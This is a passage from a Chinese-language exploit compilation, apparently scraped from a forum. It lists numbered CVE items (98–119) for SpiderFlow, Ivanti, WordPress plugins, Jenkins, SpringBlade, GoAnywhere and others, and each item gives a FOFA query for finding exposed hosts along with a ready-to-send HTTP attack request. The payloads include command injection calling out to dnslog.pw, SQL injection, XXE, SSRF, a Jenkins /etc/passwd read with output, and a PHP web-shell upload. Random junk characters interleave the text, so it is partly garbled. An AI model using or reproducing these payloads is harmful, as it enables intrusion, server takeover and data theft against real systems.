9 m* Z2 q# c( g- @Connection: close' t& c1 I, i: c. O* T7 Q5 Q2 h
Cookie: rememberMe=PAYLOAD. `7 c2 b3 B  y$ H' d
X-Token-Data: echo "2a4MU6FVYI3qR4AWxn1Bdfh6Ttk"
2 X2 t+ U  E  ~4 [  y8 ^, E* `# S, f$ C2 F2 W( W! m5 w
- e, m. [. B+ ]& b1 v  U6 \" W% }
98. SpiderFlow爬虫平台远程命令执行4 l1 z" G) e, Y
CVE-2024-0195( i5 ~1 e6 f( E2 O4 }* E
FOFA:app="SpiderFlow"2 Z$ M, F( q' p! X, \
POST /function/save HTTP/1.1
1 P2 U; Y! I. m; G' v7 yHost: 192.168.40.130:8088
) G5 b- v: j- ~0 O  SUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.09 S5 ]: e3 P1 R3 w# q$ A! V8 a
Connection: close
# W* L- Z5 `  G1 M1 O" q/ E' u3 k( zContent-Length: 121: U6 U5 _5 Z! [  ?& y1 D/ h
Accept: */*
1 w4 X+ u+ w& ^- Y( F. nAccept-Encoding: gzip, deflate
* a# M" d" [1 U5 c$ ~* a" OAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2% n; b7 u7 b3 O' n5 F' r' l6 P
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
" Z7 T0 ~% |2 `4 F  OX-Requested-With: XMLHttpRequest
  |* F: e3 i  R+ ^; l! T5 Q+ }. u# F  r
id=1&name=cmd&parameter=rce&script=%7DJava.type('java.lang.Runtime').getRuntime().exec('ping+a4xs0nop.dnslog.pw')%3B%7B
/ Y2 {- @9 o: j1 B9 G5 v4 P; m. B3 a- f, c$ l0 b8 z: ?' n5 ~4 n
+ H1 G" K6 \# C* n8 r- ]
99. Ncast盈可视高清智能录播系统busiFacade RCE
& f/ u. a- @1 oCVE-2024-0305
4 _; n# C5 D, ?4 mFOFA:app="Ncast-产品" && title=="高清智能录播系统"
" n9 ]3 P% P, r  V1 g! ?- Y- ]) hPOST /classes/common/busiFacade.php HTTP/1.1. ?3 A# W( O. ~! O, T& U# S
Host: 192.168.40.130:80802 I, e6 `' R# E1 z" M- C
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
5 l8 Q2 l! N: e% g7 i4 a: XConnection: close
( e- A6 ~+ z4 kContent-Length: 1546 x% x  r  Z- N- a
Accept: */*
, Z" g$ k& N, N" A; d/ JAccept-Encoding: gzip, deflate
. O  n/ j9 \6 }Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
  W6 m7 L* p$ c4 i3 MContent-Type: application/x-www-form-urlencoded; charset=UTF-88 Q" \& P. z; e: Q
X-Requested-With: XMLHttpRequest9 |9 v, N! S* t1 s- M

, S" H1 \9 ?3 X9 G1 J* d7 \%7B%22name%22:%22ping%22,%22serviceName%22:%22SysManager%22,%22userTransaction%22:false,%22param%22:%5B%22ping%20127.0.0.1%20%7C%20echo%20hello%22%5D%7D  Q: ?, A! ^2 P  d

( i/ @9 Q+ p$ r; |+ m% q- E2 Z% f4 O0 g8 w1 f  q- J
100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传2 A0 O! a5 W% K$ M/ p. @
CVE-2024-0352
1 U9 ?# i9 A) c. H) |! m. K0 kFOFA:icon_hash="874152924"
" Z7 ]. H  B# F6 E3 C" j. LPOST /api/file/formimage HTTP/1.1
1 v2 G* l/ i# F. z$ y# Z& ]/ LHost: 192.168.40.130! U2 w0 e, D3 \+ u
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36; d- S& L2 \& v( x
Connection: close+ [& ]" l. ]) h/ [! t  D5 m
Content-Length: 201
9 b. S8 Y  [; I; RContent-Type: multipart/form-data; boundary=----WebKitFormBoundarygcflwtei
6 ]7 e5 t. l2 \7 rAccept-Encoding: gzip3 }9 d- v2 A. W! @" G5 H; Q  j1 |
" F( m( p2 J0 s9 R( e" B2 g
------WebKitFormBoundarygcflwtei3 Y' P  ^; a. A7 c/ ~/ P. F2 T6 c+ N
Content-Disposition: form-data; name="file";filename="IE4MGP.php"  d) z3 d' x4 W7 s9 p! b: ^: u
Content-Type: application/x-php
4 }( h. c( m1 M! l5 |  J* u6 y: q( S0 J+ j0 l3 M
2ayyhRXiAsKXL8olvF5s4qqyI2O' v- [) b. X' q+ }
------WebKitFormBoundarygcflwtei--
$ i2 z% F  ?* u1 M$ I7 p3 r6 |  s# E- y0 e+ T" ^$ f

; i, W2 N2 {+ Y8 ~/ S& [+ H: x101. ivanti policy secure-22.6命令注入& m7 x5 T. w" k: \( N) ]
CVE-2024-21887
5 O0 k9 h, f: ?% @/ OFOFA:body="welcome.cgi?p=logo"
  s' `1 Q) @; n. g0 k2 I) h4 \GET /api/v1/totp/user-backup-code/../../license/keys-status/%3bcurl%20a4xs0nop.dnslog.pw HTTP/1.1
/ }0 F+ y+ p# ^, [4 V, }4 FHost: x.x.x.xx.x.x.x
+ ~# u' O+ M* W, D6 ~User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36) V1 X# w/ `1 \5 m) y  z) p7 ?+ H1 r
Connection: close4 ~5 C, W! W: C, _& R# d8 ?5 H
Accept-Encoding: gzip$ W: {7 |" q, P) @

0 P8 X& v" T: y& r2 @
$ v) A2 i" }& p  C102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行" g& @+ @+ z: k' z! q" N
CVE-2024-21893: o8 u6 |0 O) }" x5 m
FOFA:body="welcome.cgi?p=logo"; N$ \7 l8 W/ i9 ?' L7 W
POST /dana-ws/saml20.ws HTTP/1.1) f! O. t9 d0 M5 [3 Z
Host: x.x.x.x$ e8 H/ t2 G2 R( T
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
* O, O/ ?( w3 G! RConnection: close' k$ M+ \0 ~$ C# i' F# p
Content-Length: 792% T6 N: p* t8 i
Accept-Encoding: gzip
' }& ^8 `5 K2 [& {* }3 E  n8 Y1 V
<?xml version="1.0" encoding="UTF-8"?><soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body>             <ds:Signature           xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                   <ds:SignedInfo>                        <ds:CanonicalizationMethod Algorithm="http://www.w3.org/2001/10/xml-exc-cc14n#"/>                         <ds:SignatureMethod Algorithm="http://www.w3.org/2000/09/xmldsig#rsa-sha1"/>                    </ds:SignedInfo>                       <<ds:SignatureValue>qwerty</ds:SignatureValue>                    <ds:KeyInfo xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.w3.org/22000/09/xmldsig" xmlns:ds="http://www.w3.org/2000/09/xmldsig#">                         <ds:RetrievalMethod URI="http://kr9dqoau.dnslog.pw"/><<ds:X509Data/>                   </ds:KeyInfo>                  <ds:Object></ds:Object>         </ds:Signature> </soap:Body></soap:Envelope>
2 i: H5 r& Z  d4 X8 R
; ?/ a0 J- q" W8 h  |103. Ivanti Pulse Connect Secure VPN XXE
% ~& v; h8 y8 N& x. U4 w, cCVE-2024-22024& K9 T" D/ G  B  ]$ ^
FOFA:body="welcome.cgi?p=logo"
/ o) K6 B+ K4 HPOST /dana-na/auth/saml-sso.cgi HTTP/1.1
' |& t0 [' w6 l/ v" G5 aHost: 192.168.40.130:111
8 F4 z  @7 X7 K5 [User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
4 G& a! u5 J) ^/ WConnection: close
5 m  m( f5 @- F4 J% eContent-Length: 204
6 `* G: a2 C( l2 m) X  |3 U0 N2 J6 dContent-Type: application/x-www-form-urlencoded3 @. O$ }9 e* e' _( Z+ A# ^
Accept-Encoding: gzip
5 h! J+ {: a, H1 i% w6 t- t/ B; K$ [* w  x% f0 w
SAMLRequest=PD94bWwgdmVyc2lvbj0iMS4wIiA/PjwhRE9DVFlQRSByb290IFs8IUVOVElUWSAlIHdhdGNoVG93ciBTWVNURU0KICAgICJodHRwOi8vYzJ2a2J3YnMuZG5zbG9nLnB3L3giPiAld2F0Y2hUb3dyO10+PHI+PC9yPg==
: C7 r6 `* J& i& A
, W9 |/ ^8 K) D: z+ j( g
7 s! y, S3 q# @其中SAMLRequest的值是xml文件内容的base64值,xml文件如下- [( E4 i/ \3 q. y+ n" ?# O: H
<?xml version="1.0" ?><!DOCTYPE root [<!ENTITY % watchTowr SYSTEM"http://c2vkbwbs.dnslog.pw/x"> %watchTowr;]><r></r>
6 h. ~, }0 D0 a" W7 U7 ?% \9 ?# A
3 l& ~8 P* E( t
! y9 U- H- w5 v* M104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露$ V8 E. `- A1 I, T2 P
CVE-2024-05699 @6 Y6 o0 Z8 e& M0 z: g1 u
FOFA:title="TOTOLINK"8 H8 ?) n6 Y7 h# t% p
POST /cgi-bin/cstecgi.cgi HTTP/1.1
1 x7 p# S6 n2 \  aHost:192.168.0.1
/ o: @# ~# f3 j) o+ }! Z% V9 iContent-Length:41
; L0 r9 ]6 a' a5 t1 m# T  [8 K% T$ uAccept:application/json,text/javascript,*/*;q=0.01
8 r: I5 t+ j- t9 _% DX-Requested-with: XMLHttpRequest9 B2 C4 p) [# r7 h$ L/ v+ X
User-Agent: Mozilla/5.0 (Windows NT 10.0;Win64; x64)AppleWebKit/537.36 (KHTML, like Gecko)Chrome/99.0.4844.51Safari/537.36
  v5 w4 f) B& K$ B/ ?* zContent-Type: application/x-www-form-urlencoded:charset=UTF-8- \* a$ X" l% r
Origin: http://192.168.0.19 Z2 @% D: t! _
Referer: http://192.168.0.1/advance/index.html?time=1671152380564) P) }( q& m; \- W
Accept-Encoding:gzip,deflate
. p0 N) V8 w- P& @/ D. RAccept-Language:zh-Tw,zh:g=0.9.en-US:g=0.8.en:g=0.7
8 i; J8 y+ w7 l, N9 d7 ZConnection:close4 E( }# O3 ~0 ]& ^; x# \
( C  r8 f. q! k: h/ [* C: r
{- T. M  P" Z& g$ i" D
"topicurl":"getSysStatusCfg",
1 r( h: }0 M# O' g. {6 T"token":""
) Z/ [+ N2 Y* i. j+ Q# {4 V" ?}/ N  o$ H3 S0 ^( a$ W; H9 m- {! @$ f$ K
/ H% H& M  K) m/ T- Q. N
105. SpringBlade v3.2.0 export-user SQL 注入
5 ~6 I; ?+ }' Z4 V1 E+ g( aFOFA:body="https://bladex.vip") Y$ E9 w' L6 P- N
http://192.168.40.130.90/api/bla ... ame&1-updatexml(1,concat(0x7e,md5(102103122),0x7e),1)=1+ y0 ?! y" U5 S7 B

' e+ s) O. V+ M9 R$ q& P# `& n" n% A2 Z106. SpringBlade dict-biz/list SQL 注入
2 v$ G; W) v8 L3 w$ z! ~( A- A0 ~FOFA:body="Saber 将不能正常工作"
# X0 s9 d, R$ bGET /api/blade-system/dict-biz/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
0 T# O' ?6 T$ M7 ^5 QHost: your-ip
5 i# A: m; _) H" wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! p3 v: {* s+ U6 {! oBlade-Auth: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzUxMiJ9.eyJpc3MiOiJpc3N1c2VyIiwiYXVkIjoiYXVkaWVuY2UiLCJ0ZW5hbnRfaWQiOiIwMDAwMDAiLCJyb2xlX25hbWUiOiJhZG1pbmlzdHJhdG9yIiwidXNlcl9pZCI6IjExMjM1OTg4MjE3Mzg2NzUyMDEiLCJyb2xlX2lkIjoiMTEyMzU5ODgxNjczODY3NTIwMSIsInVzZXJfbmFtZSI6ImFkbWluIiwib2F1dGhfaWQiOiIiLCJ0b2tlbl90eXBlIjoiYWNjZXNzX3Rva2VuIiwiZGVwdF9pZCI6IjExMjM1OTg4MTM3Mzg2NzUyMDEiLCJhY2NvdW50IjoiYWRtaW4iLCJjbGllbnRfaWQiOiJzd29yZCIsImV4cCI6MTc5MTU3MzkyMiwibmJmIjoxNjkxNTcwMzIyfQ.wxB9etQp2DUL5d3-VkChwDCV3Kp-qxjvhIF_aD_beF_KLwUHV7ROuQeroayRCPWgOcmjsOVq6FWdvvyhlz9j7A) \1 r: P! e, n6 Q
Accept-Encoding: gzip, deflate
2 f, A; x6 x  z3 A9 `Accept-Language: zh-CN,zh;q=0.9
7 X' ~0 r. B- oConnection: close# N. G- l1 F" _+ L% H& D

; i( H! D6 C% B' ]& f% `- u# x) W) v' q
107. SpringBlade tenant/list SQL 注入2 e9 p. l+ ^3 l5 G
FOFA:body="https://bladex.vip"
( u9 L6 r' F. p0 I( i$ }GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e),1)=1 HTTP/1.1
" E2 _1 _) L, ?* x. R! Z7 GHost: your-ip- i. D; m. k  k! r' T0 y
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.360 r0 P) A( ?  c% E" V
Blade-Auth:替换为自己的4 p* M# X5 [8 Q4 |
Connection: close- u) L; y4 |( k6 b' f& A- f% o
2 l5 J6 r& g  y9 a5 s+ B, k

) V8 H- l. ?1 Q" Y9 r3 Q' Q. i4 z+ g0 U108. D-Tale 3.9.0 SSRF$ p" M) v. D8 o. n9 p4 l
CVE-2024-216429 ?# }/ }, o' b
FOFA:"dtale/static/images/favicon.png"  w, F  _$ z' P2 g
GET /dtale/web-upload?type=csv&url=http%3A%2F%2Fa4xs0nop.dnslog.pw HTTP/1.1; ]" @$ D0 }8 y# P/ T6 P" h' P
Host: your-ip
0 H# m+ ]0 F9 ]) FAccept: application/json, text/plain, */*- t8 z# H0 P' n5 e" D% F7 Q! d
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36" d6 `3 a4 n! }+ M" e! w1 q( H2 |
Accept-Encoding: gzip, deflate  b0 Z' V% m( E( s' y- s( K
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8% O+ Y+ p+ X; i9 ~! v
Connection: close
- T- U5 ~5 V( Z' e* _: `1 p2 k: @
+ z; ]8 k, v, ~: t/ h" k! W  X$ u- ~: S! }9 T
109. Jenkins CLI 任意文件读取4 Y+ J  N, X/ f5 `( q2 A/ _
CVE-2024-23897% N- f! Y: Q( ^  k+ J( y+ E2 A: I
FOFA:header="X-Jenkins"5 [7 ?6 A) @% O! A7 V
POST /cli?remoting=false HTTP/1.1
8 ~$ i6 l4 k# \  a& R$ JHost:( Z  |  A/ `) X) @' \) [2 A
Content-type: application/octet-stream
2 k# B! c0 s, `8 E$ @Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92; a* @- t$ ]' g
Side: upload
' N9 v5 J* h: p$ v2 [( {/ T8 mConnection: keep-alive2 ^2 A: g9 s. x: c& q
Content-Length: 163
& g9 J. W9 L( m2 o
6 W8 E8 s/ A$ z2 O. Xb'\x00\x00\x00\x06\x00\x00\x04help\x00\x00\x00\x0e\x00\x00\x0c@/etc/passwd\x00\x00\x00\x05\x02\x00\x03GBK\x00\x00\x00\x07\x01\x00\x05en_US\x00\x00\x00\x00\x03'
5 B2 c. \& Y7 g) T9 z* |/ N( [4 `
. h" J. N& F6 X" T- C- t
3 d/ A) \& J- x" }) ?2 G! O+ IPOST /cli?remoting=false HTTP/1.1
. G' p5 h4 V4 C: v" I3 V) q' AHost:8 C+ C& _, [/ y- i8 v; V
Session: 39382176-ac9c-4a00-bbc6-4172b3cf1e92
8 V; _0 [; S+ }1 x3 Idownload. g3 f( U) `0 ~+ }% a
Content-Type: application/x-www-form-urlencoded; w5 C* @; Z# f& q  _9 }& o
Content-Length: 0$ ?3 E6 M9 f8 r' d! q2 y1 l, l

4 A9 ]8 g  @- h) y$ y7 E6 s! k4 W
( f. d: b# J: H+ y3 {; c3 dERROR: Too many arguments: daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin1 M$ L# s8 Y- m  S
java -jar jenkins-cli.jar help. r: C% l/ j0 f* _  N: `4 @
[COMMAND]
- q& p: _1 C! s. w8 z3 P+ VLists all the available commands or a detailed description of single command., W+ q/ O1 ^2 V; `
COMMAND : Name of the command (default: root:x:0:0:root:/root:/bin/bash)
' _, j# H+ ]# `2 U, r" ~
& r* I3 o9 W3 r0 e. C6 Y
0 S' I# I) y# A# ^+ H! j1 p110. Goanywhere MFT 未授权创建管理员, K% r, t, Q: W+ n; h
CVE-2024-0204' l7 G9 R+ [) D% o4 k
FOFA:body="InvalidBrowser.xhtml"|| icon_hash="1484947000"|| icon_hash="1828756398"|| icon_hash="1170495932"/ v8 X. v" O# R
GET /goanywhere/images/..;/wizard/InitialAccountSetup.xhtml HTTP/1.11 ~6 ]9 b, B( S% i0 L/ `
Host: 192.168.40.130:80002 y5 @8 T/ Y1 l% c  b
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36' M% t7 i% i; H0 t- {; c# T! }
Connection: close
2 M& C2 N! h& W- a/ _Accept: */*1 `: `3 V) D5 {( o+ B! j" T
Accept-Language: en$ ]  p% E7 n5 F, |) P; Q# A, F
Accept-Encoding: gzip
7 v: p2 J! e0 ^, {! P
0 }7 U- Y, ?6 R7 I9 Z; T& L6 |) y
111. WordPress Plugin HTML5 Video Player SQL注入2 ^/ I* M8 A$ `+ P
CVE-2024-1061
& \5 V6 `5 c0 l: C( ^8 e! xFOFA:"wordpress" && body="html5-video-player"
4 p& @9 y0 u, g# V0 ~GET /?rest_route=/h5vp/v1/view/1&id=1'+AND+(SELECT+1+FROM+(SELECT(SLEEP(6)))a)--+- HTTP/1.1
6 B0 ^9 u- {5 Y5 E# JHost: 192.168.40.130:112
2 |6 b) y5 m# BUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36
/ d8 q! E1 F5 W* PConnection: close$ z$ j1 k* O; G' ]4 O
Accept: */*
6 U2 U7 k$ T: E! YAccept-Language: en+ E0 h3 e+ G; v$ A: A7 N  z! i4 K/ Z
Accept-Encoding: gzip
4 f( n. Q' a' k
5 y/ I6 l# U5 |) l% H, i( F7 j5 }- i
+ R4 B) \; E6 e8 R0 B3 u112. WordPress Plugin NotificationX SQL 注入0 P* ^! e: o. B
CVE-2024-1698
/ M# z- F, M3 n; [4 ]& r5 H  XFOFA:body="/wp-content/plugins/notificationx"
$ c1 H3 A6 Q' q' ]POST /wp-json/notificationx/v1/analytics HTTP/1.1$ ^3 [4 q1 w- i: v2 V6 A/ z
Host: {{Hostname}}
5 h% o- O) h7 a/ f0 ]0 R6 lContent-Type: application/json* i0 K' G2 M8 v$ j5 I, ^* S

* x2 Z1 J& }1 v8 A0 P5 I0 }{"nx_id": "1","type": "clicks`=1 and 1=sleep(5)-- -"}  `7 L' S/ u. U& n) s
5 @/ W' x! B; j6 C% Y9 F! [! V
9 g, Z5 a' f1 N5 ^8 B7 k' \& {
113. WordPress Automatic 插件任意文件下载和SSRF
" C, [# h9 R  h6 q) \; oCVE-2024-27954* Z0 d3 \: c9 {5 ]3 Z+ U
FOFA:"/wp-content/plugins/wp-automatic": z7 p( s5 p6 t% E  P
GET /?p=3232&wp_automatic=download&link=file:///etc/passwd HTTP/1.1" N. A" |8 {. b2 k. @; J% v/ c( z) \
Host: x.x.x.x8 q* L8 E) o+ D* I! i
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36
  j, ?; o$ n# M; F3 ?' \Connection: close
. h7 |. n5 D0 X: p* C" S. M5 T2 rAccept: */*( y+ C) w# w% E3 J: E4 N1 o
Accept-Language: en
' B9 ]: k* p* i# y- }) NAccept-Encoding: gzip/ N% G% a* O9 J+ ^2 q7 {
% j$ P+ w5 }$ J
2 d1 L* P% A0 N
114. WordPress MasterStudy LMS插件 SQL注入
2 V& ~( p7 H3 @/ n; SFOFA:body="wp-content/plugins/masterstudy-lms-learning-management-system/", D& v* ^6 Z* M; I
GET /?rest_route=/lms/stm-lms/order/items&author_id=1&user=1)+AND+%28SELECT+3493+FROM+%28SELECT%28SLEEP%285%29%29%29sauT%29+AND+%283071%3D3071 HTTP/1.1! B5 V+ G4 z" T9 j1 F
Host: your-ip6 C+ C& g, J2 S: N
User-Agent: Mozilla/5.0 (Linux; Android 11; motorola edge 20 fusion) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.61 Mobile Safari/537.36
/ `* i" p0 g4 f$ h( L. Q1 D- |( vAccept-Charset: utf-8) Y3 y6 b0 |% s' U# v
Accept-Encoding: gzip, deflate
6 K0 `( Z- q5 |$ ?: Y. R: K" A; DConnection: close
1 b+ U$ B$ H4 A) a/ |" k
& ?4 a4 q3 \; e( z( n+ I
" F9 Q( {5 g- R' k) L+ R115. WordPress Bricks Builder <= 1.9.6 RCE
( ~. H5 i* ]: DCVE-2024-256005 o5 A+ S# W$ C3 z2 [7 K6 s
FOFA: body="/wp-content/themes/bricks/"
7 ~5 t2 n4 w0 z% l2 f! `第一步,获取网站的nonce值
3 c/ k7 }( L8 m& l5 U$ l) |GET / HTTP/1.1+ V8 ]( h' ]: O2 ]6 S
Host: x.x.x.x5 ^2 h: E0 A% z
User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
% D0 N! O/ Q& [8 R9 TConnection: close' x9 l7 q$ f; Z: x6 Y( O
Accept-Encoding: gzip4 M4 l3 N! L) U( ^
( `9 J2 m0 C: t  y  v$ A
6 J# }, d3 w9 g
第二步替换nonce值,执行命令
1 `. d" W. _" }% [/ ?8 o: z2 CPOST /wp-json/bricks/v1/render_element HTTP/1.1
( g3 f. C) E/ T4 R; `Host: x.x.x.x& v% X$ v2 G6 @6 z8 n
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36* Y2 ]# N: v# M) F( F
Connection: close
; t5 W0 ]" I, s) HContent-Length: 356
" z3 Y* p. f% h4 jContent-Type: application/json
$ A# [% r9 m+ [+ Y" RAccept-Encoding: gzip
$ Z: M- H( a% N/ r5 z) R
" v/ x' b! \$ k' |) j: {; C( p{
: N8 C! E% ?! B8 Y% X: _3 ?"postId": "1",
7 y& a, N$ [+ U: l  "nonce": "第一步获得的值",
6 f7 Y( x. x5 x4 o% U5 s$ N" j  "element": {
0 p* [+ i& T  E3 h! u. w* f    "name": "container",% c/ e1 {* P# D% @1 B
    "settings": {
( X5 |4 p% [, _( [# ^      "hasLoop": "true",
8 y7 [- k. Z4 q( E' f1 _      "query": {
% _* F/ b$ m" d7 G8 y        "useQueryEditor": true,8 z# u: d+ _* b* j  J
        "queryEditor": "ob_start();echo `id`;$output=ob_get_contents();ob_end_clean();throw new Exception($output);",& F5 b+ P  ^- t# t& W+ W; a0 x
        "objectType": "post"
9 |% @" w9 u/ E  \" P- A      }
* j1 q1 U/ s" b    }
. }  {8 x  |4 Z5 @  q# g& s3 V  }: b7 s% s$ D( N( `' S1 g3 n
}
0 a5 V0 O& @# L' x
+ }" I) m, f+ E; l& g
0 V4 b: j) d4 k# }- n( f: D116. wordpress js-support-ticket文件上传4 U% a$ ]+ S, B. D
FOFA:body="wp-content/plugins/js-support-ticket"
8 d- g! Q% V" Q: ~POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1. D8 \, {5 N* G- w6 d5 A) ^, j9 H/ G
Host:
6 m9 ]$ I% n2 f3 D% QContent-Type: multipart/form-data; boundary=--------7670991710 k3 ~3 N! ]# M' [+ ?  ]7 _
User-Agent: Mozilla/5.0
2 R  _+ H8 |. J( A& m9 c
) ~$ s, F1 e: \# L; P7 _7 s----------767099171+ y4 f+ M  h& Y: e( i* X
Content-Disposition: form-data; name="action"$ }/ W6 O% K, F7 y  I
configuration_saveconfiguration& q$ @$ k% {* H5 l$ `9 x
----------767099171: b& @$ f. X# g; Z4 M5 t
Content-Disposition: form-data; name="form_request"; c6 x1 \7 X; n6 {  K4 p6 j
jssupportticket3 \7 e7 G- Y( L1 _/ W# w" A) @( t
----------767099171
4 f$ _9 k; g7 P. P: SContent-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"
' Y+ `+ l& r  `# H$ FContent-Type: image/png
( L7 k3 ~. Q1 ~4 G" U9 X  c. e% K----------767099171--! N2 g' a' M/ T1 n) Y
) E" @0 `7 J+ d' f; j

- B) m, d, [( j. D8 c3 O0 _117. WordPress LayerSlider插件SQL注入
! H; H2 L% p. e5 e7 A/ v5 \& {version:7.9.11 – 7.10.08 ]6 f) P) u: A* c
FOFA:body="/wp-content/plugins/LayerSlider/"
3 Y2 S4 I* f6 ~  mGET /wp-admin/admin-ajax.php?action=ls_get_popup_markup&id[where]=1)and+(SELECT+6416+FROM+(SELECT(SLEEP(5)))nEiK)--+vqlq HTTP/1.1
2 W! y9 H. e" ~- \; A2 f  d$ NHost: your-ip
$ K& `) [  D; M5 \/ I+ PUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
1 |5 k3 H. i. b8 b8 uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8/ S" A; y7 y- w( a* U
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.22 R+ p/ o6 N7 J
Accept-Encoding: gzip, deflate, br3 @% `8 i' y: s! X, V
Connection: close
9 Z2 I/ n3 D. f& I, HUpgrade-Insecure-Requests: 1
3 ~8 j. D+ c: {: ?; F  N3 ~; X$ h  W, k+ Z* K$ _# K* B9 y

1 K5 I# n9 Q& }( h# \5 J% C4 `118. 北京百绰智能S210管理平台uploadfile.php任意文件上传9 k" X4 [, g5 k5 s
CVE-2024-09394 T/ ]' ^1 J4 o, D1 ^, N6 D
FOFA:title="Smart管理平台"+ ^0 H( C, H$ ?: E
POST /Tool/uploadfile.php? HTTP/1.10 H3 d& p1 H3 y# ]6 L
Host: 192.168.40.130:8443
8 a' k% t' t2 q0 _/ W: FCookie: PHPSESSID=fd847fe4280e50c2c3855ffdee69b8f8) j  `, X) D" M
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/117.02 R& k  h* ~6 F$ n/ |, j
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
$ L3 H, h; b4 ?+ H+ I* MAccept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.28 h; J* k' Z3 O8 [( Y$ @! D
Accept-Encoding: gzip, deflate
+ g1 f7 Y1 h/ O& v. VContent-Type: multipart/form-data; boundary=---------------------------139797012227476466340371828875 V' x& \3 b0 O+ U2 M7 |  r1 E' q
Content-Length: 405" u, k: c3 u6 [- R
Origin: https://192.168.40.130:84439 C" E6 X4 G9 K/ u, p" G
Referer: https://192.168.40.130:8443/Tool/uploadfile.php
3 ]: m. o- O9 c4 L! hUpgrade-Insecure-Requests: 1
7 |+ p! ~! p7 BSec-Fetch-Dest: document
0 v9 A8 j4 E; S+ E/ _2 z5 ZSec-Fetch-Mode: navigate5 ]9 S7 S9 x) _5 j( n6 T
Sec-Fetch-Site: same-origin6 n. a+ y$ J  G% X
Sec-Fetch-User: ?1' K& O8 _7 f* ^7 A
Te: trailers
4 E5 ~$ b* T! ^Connection: close$ v( |( d; G! O

  b& r$ b: h/ g! F-----------------------------13979701222747646634037182887
3 \, e: S) z7 i7 y3 vContent-Disposition: form-data; name="file_upload"; filename="contents.php"2 j0 H, W: R6 `. S, ?) Y" o
Content-Type: application/octet-stream1 Q/ m. N& }1 X+ O
: N+ Y2 E+ ~) H, d/ B. {; d
<?php
6 B$ j' z3 X( l8 H  X. m* Ysystem($_POST["passwd"]);8 F2 A+ A+ h& o; O
?>
0 ^. F2 N3 p& [$ \# D" Y$ M5 n-----------------------------139797012227476466340371828878 \! h$ E7 R* Y" c! Q# i1 G) i" x
Content-Disposition: form-data; name="txt_path"
8 X8 G; l5 ~' V' R# K% l. @$ z6 D5 n- ~2 v  C7 Y! H; g
/home/src.php
2 _; o2 K7 E. `* q; Z-----------------------------13979701222747646634037182887--
4 E6 U0 W9 {$ r* X( ~( d5 D
" }0 q) d- Z- M( q  a& h
% K" m9 z% L$ g& g. w访问/home/src.php
9 Y0 \0 Q5 m2 k7 H, _; ]: h# D
1 h. c0 R7 g$ g* [. k" U119. 北京百绰智能S20后台sysmanageajax.php sql注入7 ~  B8 ^3 a% y* {* `8 A4 |2 f
CVE-2024-12546 X& U9 x* ?4 f0 d3 S
FOFA:title="Smart管理平台"9 N: ]$ Z& B6 B: n/ ]
先登录进入系统,默认账号密码为admin/admin) P( d( W5 m, d; P, E8 d
POST /sysmanage/sysmanageajax.php HTTP/1.11
